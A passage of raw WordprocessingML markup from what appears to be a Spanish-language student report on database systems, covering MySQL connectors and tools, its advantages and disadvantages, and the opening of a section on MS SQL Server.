        <w:t>La interfaz para el conector ODBC (MyODBC) proporciona a </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="0082495F">
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="00000A"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>MySQL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> soporte para programas clientes que usen conexiones ODBC (Open Database Connectivity).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La interfaz para el conector J </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="0082495F">
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="00000A"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>MySQL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> proporciona soporte para clientes Java que usen conexiones JDBC.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0082495F" w:rsidRPr="00F7769F" w:rsidRDefault="0082495F" w:rsidP="0082495F">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="0082495F">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Clientes y herramientas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00DE74BD" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidR="00F7769F" w:rsidRPr="0082495F">
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="00000A"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>MySQL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F7769F" w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> server tiene soporte para comandos SQL para chequear, optimizar, y reparar tablas. Estos comandos están disponibles a través de la línea de comandos y el cliente </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidR="00F7769F" w:rsidRPr="0082495F">
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="00000A"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>mysql</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F7769F" w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>check</w:t>
      </w:r>
      <w:r w:rsidR="00F7769F" w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Todos los programas </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="0082495F">
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="00000A"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>MySQL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> pueden invocarse con las opciones </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>--help</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> o </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>-?</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> para obtener asistencia en línea. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="00000A"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:id w:val="-483936927"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="00F7769F">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00F7769F">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION MyS10 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00F7769F">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE" w:rsidRPr="009E53AE">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:noProof/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t>(MySQL Developer Zone, 2010)</w:t>
          </w:r>
          <w:r w:rsidRPr="00F7769F">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00376E2B">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Ventajas</w:t>
      </w:r>
      <w:r w:rsidR="00376E2B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Velocidad al realizar las operaciones.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Bajo costo en requerimientos para la elaboración de bases de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Facilidad de configuración e instalación.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>MySQL software es Open Source</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Facilidad de configuración e instalación.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Soporta gran variedad de SO.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Baja probabilidad de corromper datos, incluso si los errores no se producen en el propio </w:t>
      </w:r>
      <w:r w:rsidR="00445DC2" w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>gestor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, sino en el sistema en el que está.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Su conectividad, velocidad, y seguridad hacen de MySQL Server altamente apropiado para acceder bases de datos en Internet.</w:t>
      </w:r>
      <w:r w:rsidR="00D168BF" w:rsidRPr="00D168BF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-178581912"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00D168BF">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00D168BF">
            <w:instrText xml:space="preserve"> CITATION Sup14 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidR="00D168BF">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Super Información Web, 2014)</w:t>
          </w:r>
          <w:r w:rsidR="00D168BF">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00376E2B">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00376E2B">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Desventajas</w:t>
      </w:r>
      <w:r w:rsidR="00376E2B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Un gran porcentaje de las utilidades de MySQL no están documentadas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>No es intuitivo.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="00000A"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:id w:val="-1558081394"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="00F7769F">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00F7769F">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Sup14 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00F7769F">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:noProof/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="009E53AE" w:rsidRPr="009E53AE">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:noProof/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t>(Super Información Web, 2014)</w:t>
          </w:r>
          <w:r w:rsidRPr="00F7769F">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="002A2C05">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>MS SQL Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="002A2C05">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="570AEDED" wp14:editId="595691FC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2019745</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>290830</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1424305" cy="818515"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1081" name="Imagen 1081" descr="Resultado de imagen para Microsoft SQL Serv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para Microsoft SQL Server logo"/>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24305" cy="8185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7769F" w:rsidRDefault="00F7769F" w:rsidP="002A2C05">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002A2C05" w:rsidRDefault="002A2C05" w:rsidP="002A2C05">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002A2C05" w:rsidRPr="00F7769F" w:rsidRDefault="002A2C05" w:rsidP="002A2C05">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00BD5F4E" w:rsidP="00BD5F4E">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F7769F" w:rsidRPr="00F7769F">
        <w:t>Es un sistema de gestión de bases de datos relacionales vasado en el lenguaje Transact-SQL, capaz de poner a disposición de muchos usuarios grandes cantidades de datos de manera simultánea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Características:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Soporta procedimientos almacenados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
